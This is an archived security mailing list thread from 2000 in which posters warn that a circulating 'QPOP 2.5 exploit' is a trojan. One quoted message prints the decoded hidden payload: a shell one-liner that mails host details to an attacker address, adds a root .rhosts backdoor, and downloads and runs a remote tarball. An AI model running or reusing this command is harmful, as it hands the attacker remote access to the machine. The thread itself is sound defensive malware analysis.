Vulnerability Development mailing list archives
Re: QPOP2.5* exploit ??
From: llmora () S21SEC COM (Lluis Mora)
Date: Mon, 15 May 2000 10:23:43 +0200
I have yet to totally decode the asm, and don't think I will bother to go any further, so it is possible it does more than just this, however it quite obviously isn't a straight qpopper exploit. Anyone tried against a qpopper install to see if it executes?
If I were you I wouldn't give it a try, as all it does is execute the shellcode _locally_ (the box trying to run the exploit), not the remote machine. It's a trojan as has been previously noticed by rpc <h () ckz org>. (char *)qpop_proc = shellcode; /* Points the qpop_proc function to the shellcode [...] /* Tries an always unsuccessful exploit */ [...] quit(0); /* Before exiting, it executes quit() */ void quit(int x) { qpop_proc(); /* which contains a call to the shellcode, executed in the local machine */ exit(x); } Cheers, Lluis Mora llmora () s21sec com -----Mensaje original----- De: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]En nombre de phi-vulndev () EXORSUS NET Enviado el: lunes 15 de mayo de 2000 2:36 Para: VULN-DEV () SECURITYFOCUS COM Asunto: Re: QPOP2.5* exploit ??
this has been found in the wild, however there seems to be a trojan in the shellcode. Popper 2.5* has been thought to be safe. I would not reccomend running this on your own machine unless you crack the shellcode and see what it does.
Trivial xor of 2 encoding of part of the shellcode reveals: /bin/sh -c /sbin/ifconfig -a | mail -s solwar etcownz () hotmail com >> /dev/null; echo '+ +' >> ~root/.rhosts; rcp lp () skinner trdlnk com:/usr/spool/lp/model/solwar.tar solwar.tar; tar -xvf solwar* >> /dev/null; cd solwar; chmod +x solwar.sh; ./solwar.sh >> /dev/null; cd ..; rm -rf solwar*; I have yet to totally decode the asm, and don't think I will bother to go any further, so it is possible it does more than just this, however it quite obviously isn't a straight qpopper exploit. Anyone tried against a qpopper install to see if it executes? Phi.
Current thread:
- Re: QPOP2.5* exploit ??, (continued)
- Re: QPOP2.5* exploit ?? jms (May 14)
- Re: QPOP2.5* exploit ?? Eric LeBlanc (May 15)
- hi sparc qpop info sp00n () GMX DE (May 14)
- Re: QPOP2.5* exploit ?? typo () INFERNO TUSCULUM EDU (May 14)
- Re: QPOP2.5* exploit ?? typo () INFERNO TUSCULUM EDU (May 14)
- Re: QPOP2.5* exploit ?? Dimitry Andric (May 14)
- Re: QPOP2.5* exploit ?? Martin Ixter (May 14)
- TROJAN WARNING: Re: QPOP2.5* exploit ?? Nic Bellamy (May 14)
- Re: QPOP2.5* exploit ?? phi-vulndev () EXORSUS NET (May 14)
- Bubble Boy Virus Spreading Mechanism Andrew Leong (May 15)
- Re: QPOP2.5* exploit ?? Lluis Mora (May 15)
- Bugtraq Stats for the last 3 years available now. Alfred Huger (May 15)
- xsoldier mandrake exploit. egid=games with the right shellcode Larry C$ (May 15)
- Re: QPOP2.5* exploit ?? rpc (May 14)
- Fwd: [Newssubmission: Security vulnerability in the ICS HTTPServer component] TLsecurity.net (May 14)
- Re: regarding phrack49's stack smashing tutorial Pavel Kankovsky (May 14)
- Re: regarding phrack49's stack smashing tutorial Darshan Patil (May 14)
- Re: is: tcp/ip vuln, not?... was: WSCRIPT.EXE ,CSCRIPT.EXE replacement for *.vbs Crispin Cowan (May 15)
- Re: is: tcp/ip vuln, not?... was: WSCRIPT.EXE ,CSCRIPT.EXE replacement for *.vbs Jason Legate (May 17)